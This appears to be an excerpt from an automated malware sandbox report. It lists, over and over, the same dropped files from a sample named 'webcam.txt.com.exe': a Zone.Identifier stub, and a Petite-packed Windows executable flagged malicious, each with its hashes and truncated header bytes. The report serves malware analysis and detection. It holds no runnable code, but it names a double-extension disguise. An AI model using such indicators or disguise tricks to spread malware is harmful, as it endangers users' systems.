                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 95%
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
